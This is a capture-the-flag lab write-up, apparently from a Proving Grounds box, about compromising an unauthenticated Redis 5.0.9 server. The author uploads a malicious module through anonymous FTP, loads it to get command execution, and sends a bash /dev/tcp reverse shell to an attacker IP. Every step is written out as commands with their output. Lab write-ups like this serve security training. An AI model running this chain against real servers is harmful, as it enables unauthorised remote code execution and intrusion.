Malicious Redis Module
The target Redis instance doesn’t have any form of authentication, and is rather obsolete as its version is 5.0.9. This leaves it vulnerable to several exploits, including loading a malicious Redis module
A malicious Redis module has been compiled & prepared. Loading the payload will allow code execution on the target system under the security context of Redis process owner
No Direct Upload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand]
└─$ redis-cli -h $IP MODULE LOAD ./module.so
(error) ERR Error loading the extension. Please check the server logs.Attempting to remotely load the malicious Redis module fails because Redis requires that the module file (.so) exists on the local filesystem of the Redis server.
FTP
I have confirmed that the target FTP instance allows anonymous access with both read and write privileges earlier. I could leverage that.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand]
└─$ ftp ftp@$IP
Connected to 192.168.185.93.
220 (vsFTPd 3.0.2)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd pub
250 Directory successfully changed.
ftp> binary
200 Switching to Binary mode.
ftp> put ./module.so
local: ./module.so remote: ./module.so
229 Entering Extended Passive Mode (|||10091|).
150 Ok to send data.
100% |*******************************************************************************************| 47760 1.85 MiB/s 00:00 ETA
226 Transfer complete.
47760 bytes sent in 00:00 (508.08 KiB/s)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand]
└─$ curl -s -T ./module.so ftp://ftp:ftp@$IP/pub/Uploading the malicious Redis module to the pub directory via FTP
FTP Location
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP MODULE LOAD /srv/ftp/pub/module.so
(error) ERR Error loading the extension. Please check the server logs.By default, ftp operates under the /srv directory in most Linux distributions
However, it doesn’t seem to be the case as the target system is CentOS
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP MODULE LOAD /var/ftp/pub/module.so
OKThe FTP location was under the /var directory.
Successfully loaded the malicious Redis module
Confirmation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP MODULE LIST
1) 1) "name"
2) "system"
3) "ver"
4) (integer) 1I can confirm that with the MODULE LIST command
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP system.exec "id"
"uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\n"Code execution confirmed
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP system.exec 'bash -c "bash -i >& /dev/tcp/192.168.45.218/6379 0>&1"'Sending a reverse shell command
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ nnc 6379
listening on [any] 6379 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.185.93] 34238
bash: no job control in this shell
[pablo@sybaris /]$ whoami
whoami
pablo
[pablo@sybaris /]$ hostname
hostname
sybaris
[pablo@sybaris /]$ ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.185.93 netmask 255.255.255.0 broadcast 192.168.185.255
ether 00:50:56:9e:40:39 txqueuelen 1000 (Ethernet)
RX packets 632 bytes 141727 (138.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 153 bytes 11563 (11.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 128 bytes 10368 (10.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 128 bytes 10368 (10.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Initial Foothold established to the target system as the pablo user via RCE from loading the malicious Redis module